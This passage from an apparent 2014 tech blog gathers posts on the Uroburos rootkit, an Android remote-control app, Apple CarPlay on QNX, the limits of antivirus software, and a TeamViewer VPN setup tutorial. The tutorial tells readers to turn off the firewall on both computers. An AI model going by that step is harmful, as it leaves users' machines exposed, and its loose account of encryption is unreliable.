It’s likened in complexity to the Stuxnet malware used to sabotage a number of Iranian nuclear centrifuges, which is saying a lot. G Data calls it “one of the most advanced rootkits (G Data) has ever analyzed.”
G Data “believes that highly trained developers must have been involved,” and that “a secret service is behind Uroburos.”
Just which secret service? G Data believes it's Russia’s. They found indications that suggest the developers of Uroburos speak Russian. They suspect the people behind Uroburos are the same who attacked U.S. systems with a malware called Agent.BTZ. The programming language is similar and Uroburos even checks to see if Agent.BTZ is already on a system, in which case it remains inactive.
Evidence also suggests the code was developed in a UTC+4:00 time zone, otherwise known as Moscow Time, which encompasses most of western Russia.
That would explain why Uroburos is either being rolled out or activated in Ukraine. Ukraine targets make up 57 percent of all instances of Uroburos infections identified by BAE Systems.
Granted, most occurred before former President Viktor Yanukovych was tossed out of power, but if we’ve learned anything about international security efforts since the NSA scandal broke, it’s that state governments are not afraid to stick their noses in their neighbors’ (and friends’) business.
See G Data's full Red Paper report on Uroburos here.

HOW TO CONTROL A COMPUTER USING AN ANDROID DEVICE

Welcome, here i will show you how to control your PC or any PC using an android device. 
To begin we will require
ANDROID REMOTE PC SERVER: download here
ANDROID PC CLIENT FOR ANDROID DEVICE: download from playstore
YOU CAN DOWNLOAD THE PREMIUM VERSION here







With this device you can control the mouse pad of your computer and remotely control some default applications, like music, video and word documents. 

check for documentation at ADREMOTEPC

Thursday, March 6, 2014

APPLE BORROWING FROM BLACKBERRY

The fact that Apple's in-car software is running atop a QNX platform would be less than newsworthy except for the fact that BlackBerry bought QNX back in 2010.

Apple has managed to rouse those of us in the tech press from the early-March doldrums by taking the wraps off CarPlay, the company’s in-vehicle iPhone interface that was revealed nine months or so earlier and simply named iOS in the Car.
BlackBerry news site N4BB managed to confirm with the spokesperson of a company called QNX that the CarPlay interface rests atop QNX’s widely-used “infotainment platform” – a fancy term for the thing with the screen in between you and your passenger that you poke at with your finger — the screen, not the passenger — to change the radio station. I suppose poking at your passenger might ultimately achieve the same result.
The fact that Apple’s in-car software is running atop a QNX platform would be less than newsworthy except for the fact that BlackBerry bought QNX back in 2010, and has used QNX technology as the basis for its ill-fated PlayBook tablet and the most recent version of its smartphone software, BlackBerry 10.
So, yes: Apple software is being powered by BlackBerry, in a sense. QNX has been the glue holding together many an in-car entertainment – sorry, infotainment – system for years and years now, so it’s likely this CarPlay interface would have been running atop it whether BlackBerry was in the picture or not. It could almost certainly run atop non-QNX systems as well for all we know.
In other scandalous news, the camera sensor in the iPhone is widely believed to be made by Sony, and the iPad, iPhone and MacBook Pro displays have come from the likes of Samsung and LG over the years. I know, right? It’s like learning that Santa Claus doesn’t… you know what? On second thought, I’m not going to spoil that one.

HOW YOUR ANTI-VIRUS SOFTWARE MIGHT BE USELESS

Some computer consultants say the global malware threat has gotten so bad that conventional security measures, such as anti-virus software, are no longer adequate to fight them.
Anti-virus programs are “totally useless,” says Mohammad Mannan, an assistant professor at the Concordia Institute for Information Systems Engineering in Montreal.
“If you use them, you might even be vulnerable [to malware] to some extent,” he says.
A recent Visa survey showing that 92 per cent of respondents under the age of 35 had been the target of phishing scams demonstrates the tenacity of the hackers who are trying to seize personal financial information.
Anti-virus software works on the principle of identifying malevolent files and infected sites. But because of the sheer volume of malware online nowadays, rather than blacklisting bad sites we should be “whitelisting” the good ones, says Stu Sjouwerman, founder and CEO of U.S.-based computer security consultancy KnowBe4.com.
The amount of malicious software — better known as “malware”— circulating on the web has grown significantly in the past decade.
According to figures from virus detection sites, in 2002 there were an estimated 17 million known “good” executable files from various existing applications on the commercial internet, while antivirus engines detected two million nefarious ones.
By 2012, there were 40 million known good files and 80 million bad ones.

Malware threat growing

The main driver of this shift is cybercrime, says Fabrice Jaubert, a software developer who works with Google’s malware detection team in Montreal.
In the past, malware was often the work of malicious individuals or pranksters looking for recognition of their coding prowess. But according to Jaubert, computer attacks nowadays are perpetrated almost entirely by organized crime.
Malware graphic
“It’s 100 per cent criminal – or 99.99999 per cent,” says Jaubert. “The end goal here is money — big money.”
Criminal hackers look for ways to install malware on your computer for the purpose of stealing your passwords, credit card numbers and banking information — which they can sell to other criminals — or commandeering your computer to distribute illicit material such as porn.
Cybercrime is estimated to be a $3 billion US industry, and its perpetrators are largely based in eastern European countries such as Romania, Russia and Ukraine, says Sjouwerman, author of Cyberheist: The Biggest Financial Threat Facing American Businesses Since the Meltdown of 2008.
One of the reasons malware is such a widespread problem is that it has become harder for consumers to detect, says Tony Anscombe, senior security evangelist for anti-virus firm AVG.
“Malware viruses used to be disruptive — if you got one, you knew you had it. Now, they’re deceptive and hide in the background,” Anscombe says.
There are a number of ways hackers can get into your computer, but nowadays, a lot of it is accomplished by “social engineering.” For example, you may get an email or even a phone call that appears to be from a bank or a tech support representative asking you to open an email attachment or to click through to an infected website. 

The problem with anti-virus software 

In the face of this ever-present threat, computer security firms have made billions of dollars selling anti-virus software to consumers.
The major problem, says Concordia’s Mannan, is that anti-virus software is by nature reactive, which means that it responds to specific malware after it has been distributed. Should a malware writer change a few lines of code, however, that anti-virus solution suddenly becomes obsolete.
It’s the sheer number of malware variations that makes it impossible for anti-virus software to effectively combat the problem, says Mannan. To illustrate this, he points to the Storm botnet of 2007, a sophisticated piece of malware that affected millions of computers worldwide and generated 8,000 variations of itself every day.
“How many updates or variants are you going to catch, if you’re an anti-virus company?” Mannan asks.
But while anti-virus software isn’t foolproof, it’s “a long way from useless,” says Brian Bourne, co-founder of Toronto's annual SecTor cybersecurity conference.
He likens anti-virus software to locking the doors of your car.
“It doesn’t stop someone who's motivated from stealing your car, but it does force them to put a little bit of effort in and it does mean you’re not quite as easy [a target] as the unlocked car beside you,” he says.
Google’s Jaubert says that in recent years, some hackers have even taken to posing online as anti-virus companies with legitimate-looking websites, finding victims by ironically playing on their fear of malware. They offer "virus scans" that are actually malware.

Is ‘whitelisting’ the answer?

Given these overwhelming threats, Sjouwerman believes whitelisting is vital to keep web surfers safe.
The principle is similar to verified accounts on Twitter, which was a response to the proliferation of bogus accounts (usually ones pretending to belong to celebrities). Rather than identifying all the fake accounts, Twitter’s verification process simply certifies the legitimate one.
Whitelisting has been around for more than a decade, says Mannan, but only a few companies offer it right now.
The way it works is that anytime you surf the web, the whitelist prompt appears in your browser. If you go to a website that has been penetrated by hackers, the browser pops up a stern warning telling you not to proceed to the site.
Google’s Chrome browser “has this to a degree, but that’s all based on blacklists,” says Sjouwerman.
Whitelisting would keep a list of good sites on your workstation and in the cloud, which is a “sanity check” for the list on your computer.
Sjouwerman is convinced it’s the only way to deal with the growing malware threat.
“We need to do a 180, and we need to stop keeping the bad guys out, because you can’t keep up,” says Sjouwerman.
“That’s why I’m on an evangelizing rampage to tell people we need to go to whitelisting.”

Sunday, March 2, 2014

HOW TO MANUALLY CONFIGURE YOUR FREE VPN- VIRTUAL PRIVATE NETWORK WITH TEAMVIEWER

This tutorial is from SMART PC TRICKS,  and is wonderfully detailed, so i thought i might share it here
What is VPN? A virtual private network (VPN) is a network that uses Internet, to allow remote offices or individual users with secure access to their organization’s network just like in local area network. How to create free software VPN? Let’s start building free VPN.! The security achieved by tunneling like Layer Two Tunneling Protocol (L2TP). In VPN connections the sender encrypting data and receiver decrypting it at the receiving end thus creating a Tunnel.
Usually CISCO VPN routers are used for corporate VPN setup. We will discuss more about VPN and VPN configuration in detail on later articles.
Is it possible to create VPN without dedicated hardware like CISCO VPN router and leased line? Yes, with the help of VPN client softwares we can configure Virtual Private Network. In this article we will cover How to set up and configure free VPN using Team Viewer, they are providing VPN service.

Team+Viewer+vpn tunnel How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software

How VPN Protects from Hackers?

By encrypting the data VPN acts as a Virtual Tunnel between sender and receiver. Only the receiver can decrypt data. A Hacker can access the encrypted data thus unable to detect original data.
For example consider
  • I’m encrypting the word ‘SmartPCTricks’ using some digital algorithms and converting it in to another data like ‘*!&@^#%$’.
  • Sending the encrypted data packet over internet. Only the receiver can decrypt ‘*!&@^#%$’ to actual data ‘SmartPCTricks’.
  • If a Hacker try to access my network he may getting only ‘*!&@^#%$’. The encrypted data path is termed as Tunnel
How+VPN+Works How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software

How TeamViewer VPN Works?

We have already discussed with Team Viewer, the best Remote Desktop Software. But most of the peoples are unaware about the VPN client facility in Team Viewer.
Unknown+VPN How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
We can create Virtual Private network via TeamViewer without any hardware (CISCO or other VPN routers).
The principle of TeamViewer Tunneling is same as normal VPN but the only difference is that the encrypting and decrypting is done in the computer itself. No hardware required for encryption and decryption. Encrypting carried by a Virtual Network Adapter and Team Viewer software.
How+TeamViewer+free+VPN+Works How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software

How to Setup a VPN using Team Viewer free VPN Service

TeamViewer has free VPN client, Here is the step by step procedure to VPN setup with TeamViewer.
Before the technical description let’s see my environment.
Problem: I want to access shared folder in my office computer, I don’t have VPN hardware. What to do?

(Start TeamViewer in both computers)
Step 1: Creating TeamViewer account Launch TeamViewer (Optional)
Go to Computers and Contacts, then Sign UP for a Free TeamViewer account.

Computers+and+Contacts+Sign+UP+In+TeamViewer+8 How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
(Click on the image to Enlarge)
Step 2: Add computer to my Team Viewer account  (Optional)
Add new computer to my account by clicking the Add button,

Add+remote+Computer+to+Team+Viewer+account How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
(Click on the image to Enlarge)
Here I added my Office PC. The green signal shows it is online now and ready to accept incoming connections.
Step 3: Install VPN Network Adapter
Click Extras >> Options >> Advanced Options

Team+Viewer+Options How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Scroll down to see Team viewer VPN Driver and click to Install
Install+Team+viewer+VPN+Network+Adapter How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
(Click to Enlarge)
A popup window will appear for installing VPN network adapter. Install it.
Installation+of+TeamViewer+VPN+Network+Adapter How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
After the VPN adapter now listed in the Network Sharing Center, but the status is disconnected.
TeamViewer+VPN+Adapter+Network+Sharing+Center How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Step 4: Obtaining IP for VPN
Now give the ID of remote computer and start VPN connection.

Team+viewer+VPN+Network+connection How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
(Optional)
If you logged in to Team Viewer account, right click on the remote PC and select VPN,

Install+TeamViewer+VPN+Network+Adapter How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
The TeamViewer provides automatic IP for your VPN adapter.
TeamViewer+automatic+IP How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Check the Adapter status now in the Network and Sharing Center!
Team+Viewer+VPN+Adapter+Status How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Yet, It is active!
Using the Test ping button you can ping to Remote computer for checking the connectivity.
Test+ping+Team+Viewer+VPN+Adapter How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
(Please turn off firewall in both computer; otherwise you cannot access the remote PC and test ping will not work)
Step 5: Explore the remote PC
Now the remote computer connected as local computer to your PC, Click Minimize button,

Minimize+button+TeamViewer+automatic+IP How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Open Start >> Run, then type \\IP of Partner and hit Enter key,
Open+Remote+Computer+Team+Viewer+VPN How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
For example \\172.16.12.55
Step 6: Authenticating Remote PC
Provide remote computer credentials, Type the User Name like

  • Domain Name\User Name (if the remote PC lies under a Domain) otherwise 
  • Computer Name\User Name (If remote PC not under a Domain
For example my Office computer not in the domain,
Computer Name: User-PC
My user name: User

So I provided User-PC\User.
Authenticating+Remote+PC+via+Team+Viewer+VPN How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
NB: You must have a password protected user account on the remote PC
Yes, That’s it. Now we have done free VPN, you are able to access the remote PC just like in a local network. You can access file, Shared folders and Shared printers etc.

Access+Remote+PC+using+Team+Viewer+VPN+setup How to Setup & Configure Free VPN (Virtual Private Network) With Team Viewer VPN Client Software
Above figure shows that I’m exploring Remote PC just like in Local Network.

 

Copyright @ 2013 TECMIE iCENTER.

.